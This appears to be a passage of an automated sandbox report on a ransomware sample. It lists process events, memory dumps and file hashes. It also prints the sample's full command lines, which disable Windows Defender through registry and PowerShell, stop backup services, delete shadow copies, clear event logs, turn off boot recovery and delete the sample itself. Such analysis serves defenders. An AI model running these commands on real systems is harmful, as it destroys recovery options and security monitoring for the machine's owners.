Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 944 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 468 wrote to memory of 1036 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 468 wrote to memory of 1036 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 468 wrote to memory of 1036 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 564 wrote to memory of 1616 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 564 wrote to memory of 1616 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 564 wrote to memory of 1616 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1860 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1860 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1860 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 624 wrote to memory of 1004 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 624 wrote to memory of 1004 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 624 wrote to memory of 1004 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1168 wrote to memory of 1320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1168 wrote to memory of 1320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1168 wrote to memory of 1320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\Bdfn_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/468-54-0x0000000000000000-mapping.dmp

memory/1036-55-0x0000000000000000-mapping.dmp

memory/564-56-0x0000000000000000-mapping.dmp

memory/1616-57-0x0000000000000000-mapping.dmp

memory/1860-58-0x0000000000000000-mapping.dmp

memory/812-59-0x0000000000000000-mapping.dmp

memory/624-60-0x0000000000000000-mapping.dmp

memory/1004-61-0x0000000000000000-mapping.dmp

memory/1168-62-0x0000000000000000-mapping.dmp

memory/1320-63-0x0000000000000000-mapping.dmp

memory/1640-64-0x0000000000000000-mapping.dmp

memory/1632-65-0x0000000000000000-mapping.dmp

memory/1460-66-0x0000000000000000-mapping.dmp

memory/1392-67-0x0000000000000000-mapping.dmp

memory/1896-68-0x0000000000000000-mapping.dmp

memory/1284-69-0x0000000000000000-mapping.dmp

memory/1288-70-0x0000000000000000-mapping.dmp

memory/1756-71-0x0000000000000000-mapping.dmp

memory/1948-72-0x0000000000000000-mapping.dmp

memory/1244-73-0x0000000000000000-mapping.dmp

memory/1008-74-0x0000000000000000-mapping.dmp

memory/892-75-0x0000000000000000-mapping.dmp

memory/1924-76-0x0000000000000000-mapping.dmp

memory/1608-77-0x0000000000000000-mapping.dmp

memory/428-78-0x0000000000000000-mapping.dmp

memory/572-79-0x0000000000000000-mapping.dmp

memory/1520-80-0x0000000000000000-mapping.dmp

memory/1864-81-0x0000000000000000-mapping.dmp

memory/1304-82-0x0000000000000000-mapping.dmp

memory/1928-83-0x0000000000000000-mapping.dmp

memory/1524-84-0x0000000000000000-mapping.dmp

memory/1512-85-0x0000000000000000-mapping.dmp

memory/1676-86-0x0000000000000000-mapping.dmp

memory/1068-87-0x0000000000000000-mapping.dmp

memory/1748-88-0x0000000000000000-mapping.dmp

memory/980-89-0x0000000000000000-mapping.dmp

memory/1044-90-0x0000000000000000-mapping.dmp

memory/1564-91-0x0000000000000000-mapping.dmp

memory/940-92-0x0000000000000000-mapping.dmp

memory/1712-93-0x0000000000000000-mapping.dmp

memory/720-94-0x0000000000000000-mapping.dmp

memory/1828-95-0x0000000000000000-mapping.dmp

memory/1772-96-0x0000000000000000-mapping.dmp

memory/660-97-0x0000000000000000-mapping.dmp

memory/1388-98-0x0000000000000000-mapping.dmp

memory/1740-99-0x0000000000000000-mapping.dmp

memory/1656-100-0x0000000000000000-mapping.dmp

memory/1560-101-0x0000000000000000-mapping.dmp

memory/1628-102-0x0000000000000000-mapping.dmp

memory/1336-103-0x0000000000000000-mapping.dmp

memory/1060-104-0x0000000000000000-mapping.dmp

memory/336-105-0x0000000000000000-mapping.dmp

memory/1508-106-0x0000000000000000-mapping.dmp

memory/1284-107-0x0000000000000000-mapping.dmp

memory/1536-108-0x0000000000000000-mapping.dmp

memory/2028-109-0x0000000000000000-mapping.dmp

memory/544-110-0x0000000000000000-mapping.dmp

memory/1824-111-0x0000000000000000-mapping.dmp

memory/1940-112-0x0000000000000000-mapping.dmp

memory/1940-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp

memory/1276-114-0x0000000000000000-mapping.dmp

memory/1528-116-0x0000000000000000-mapping.dmp

memory/1272-118-0x0000000000000000-mapping.dmp

memory/884-119-0x0000000000000000-mapping.dmp

memory/592-120-0x0000000000000000-mapping.dmp

memory/2088-123-0x0000000002850000-0x0000000002852000-memory.dmp

memory/2088-124-0x0000000002852000-0x0000000002854000-memory.dmp

memory/2088-125-0x0000000002854000-0x0000000002857000-memory.dmp

memory/2088-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp

memory/2088-126-0x000000001B790000-0x000000001BA8F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 04eeccf0e131af62b6301f5b0b0ff47a
SHA1 ba763c47a01a24e326fc2dc49d5ae8e8d294c9fe
SHA256 72af9f971933498fc59abaf6e92d02d85bbb6d58333c645bc0ec5da65ccb375e
SHA512 241a76e6985d1de36c585591afaade412d810799345ed872a211bc7552a37a3473f6a473725ba63510aedb9c710eb13a0216da7920b05c773f6e40ed755133cd

memory/2176-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp

memory/2088-130-0x000000000285B000-0x000000000287A000-memory.dmp

memory/2176-131-0x0000000002570000-0x0000000002572000-memory.dmp

memory/2176-132-0x0000000002572000-0x0000000002574000-memory.dmp

memory/2176-133-0x0000000002574000-0x0000000002577000-memory.dmp

memory/2176-134-0x000000000257B000-0x000000000259A000-memory.dmp

C:\Bdfn_HOW_TO_DECRYPT.txt

MD5 9462dca09abeb3961f88cfb6b2d54ca7
SHA1 ab4d8445f852cb514e73f611be5c9f30d28861ca
SHA256 ed6fed4612fa79435fdb285e29629d3d053ad77d2c0727d7aa1b2453a6a9c3fa
SHA512 7ab3f07b129f181d7738a068eb3657cb395863689bffe6c98ea9647948a67f82c44ad66c1907b9cfc8e623edfe8a1a5b149624e2913f6d56dead5bb56235cab4